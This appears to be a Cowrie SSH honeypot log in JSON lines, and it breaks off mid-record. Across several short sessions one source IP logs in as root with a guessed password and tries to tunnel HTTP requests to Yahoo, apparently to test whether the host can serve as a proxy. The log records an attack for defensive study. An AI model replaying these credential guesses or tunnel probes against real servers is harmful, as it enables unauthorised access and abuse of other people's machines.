{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:28.171628Z","src_ip":"213.209.150.239","session":"e41ad2fdc115"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:28.229742Z","src_ip":"213.209.150.239","session":"e41ad2fdc115"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":36579,"dst_ip":"1.2.3.4","dst_port":22,"session":"0556136586e7","protocol":"ssh","message":"New connection: 213.209.150.239:36579 (1.2.3.4:22) [session: 0556136586e7]","sensor":"my-vps","timestamp":"2025-08-26T01:05:28.285494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:28.286569Z","src_ip":"213.209.150.239","session":"0556136586e7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:28.343216Z","src_ip":"213.209.150.239","session":"0556136586e7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:28.626055Z","src_ip":"213.209.150.239","session":"0556136586e7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":15309,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:15309","sensor":"my-vps","timestamp":"2025-08-26T01:05:28.683531Z","session":"0556136586e7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:28.740329Z","src_ip":"213.209.150.239","session":"0556136586e7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":9842,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:9842","sensor":"my-vps","timestamp":"2025-08-26T01:05:28.894976Z","session":"0556136586e7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:28.951645Z","src_ip":"213.209.150.239","session":"0556136586e7"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:29.009103Z","src_ip":"213.209.150.239","session":"0556136586e7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":36641,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8cf54e8a52a","protocol":"ssh","message":"New connection: 213.209.150.239:36641 (1.2.3.4:22) [session: b8cf54e8a52a]","sensor":"my-vps","timestamp":"2025-08-26T01:05:29.064712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:29.065773Z","src_ip":"213.209.150.239","session":"b8cf54e8a52a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:29.122395Z","src_ip":"213.209.150.239","session":"b8cf54e8a52a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:29.404968Z","src_ip":"213.209.150.239","session":"b8cf54e8a52a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":30498,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:30498","sensor":"my-vps","timestamp":"2025-08-26T01:05:29.462600Z","session":"b8cf54e8a52a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:29.519550Z","src_ip":"213.209.150.239","session":"b8cf54e8a52a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":10667,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:10667","sensor":"my-vps","timestamp":"2025-08-26T01:05:29.675053Z","session":"b8cf54e8a52a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:29.731894Z","src_ip":"213.209.150.239","session":"b8cf54e8a52a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:29.790741Z","src_ip":"213.209.150.239","session":"b8cf54e8a52a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":36698,"dst_ip":"1.2.3.4","dst_port":22,"session":"c05daebbb2b2","protocol":"ssh","message":"New connection: 213.209.150.239:36698 (1.2.3.4:22) [session: c05daebbb2b2]","sensor":"my-vps","timestamp":"2025-08-26T01:05:29.836640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:29.837419Z","src_ip":"213.209.150.239","session":"c05daebbb2b2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:29.884942Z","src_ip":"213.209.150.239","session":"c05daebbb2b2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:30.120336Z","src_ip":"213.209.150.239","session":"c05daebbb2b2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":6131,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:6131","sensor":"my-vps","timestamp":"2025-08-26T01:05:30.168690Z","session":"c05daebbb2b2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:30.215964Z","src_ip":"213.209.150.239","session":"c05daebbb2b2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":2171,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2171","sensor":"my-vps","timestamp":"2025-08-26T01:05:30.353553Z","session":"c05daebbb2b2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:30.400696Z","src_ip":"213.209.150.239","session":"c05daebbb2b2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:30.448994Z","src_ip":"213.209.150.239","session":"c05daebbb2b2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":36750,"dst_ip":"1.2.3.4","dst_port":22,"session":"f01a2bde356a","protocol":"ssh","message":"New connection: 213.209.150.239:36750 (1.2.3.4:22) [session: f01a2bde356a]","sensor":"my-vps","timestamp":"2025-08-26T01:05:30.504473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:30.505340Z","src_ip":"213.209.150.239","session":"f01a2bde356a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:30.562233Z","src_ip":"213.209.150.239","session":"f01a2bde356a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:30.844617Z","src_ip":"213.209.150.239","session":"f01a2bde356a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":7609,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:7609","sensor":"my-vps","timestamp":"2025-08-26T01:05:30.903045Z","session":"f01a2bde356a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:30.959851Z","src_ip":"213.209.150.239","session":"f01a2bde356a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":5468,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:5468","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.115224Z","session":"f01a2bde356a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.171819Z","src_ip":"213.209.150.239","session":"f01a2bde356a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.229092Z","src_ip":"213.209.150.239","session":"f01a2bde356a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":36987,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a10de8b50da","protocol":"ssh","message":"New connection: 213.209.150.239:36987 (1.2.3.4:22) [session: 0a10de8b50da]","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.275062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.276090Z","src_ip":"213.209.150.239","session":"0a10de8b50da"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.323119Z","src_ip":"213.209.150.239","session":"0a10de8b50da"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.557420Z","src_ip":"213.209.150.239","session":"0a10de8b50da"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":32453,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:32453","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.605241Z","session":"0a10de8b50da"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.652416Z","src_ip":"213.209.150.239","session":"0a10de8b50da"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":2617,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:2617","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.789392Z","session":"0a10de8b50da"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.836469Z","src_ip":"213.209.150.239","session":"0a10de8b50da"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.884121Z","src_ip":"213.209.150.239","session":"0a10de8b50da"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":37038,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc68526b66fd","protocol":"ssh","message":"New connection: 213.209.150.239:37038 (1.2.3.4:22) [session: cc68526b66fd]","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.939996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:05:31.941060Z","src_ip":"213.209.150.239","session":"cc68526b66fd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ex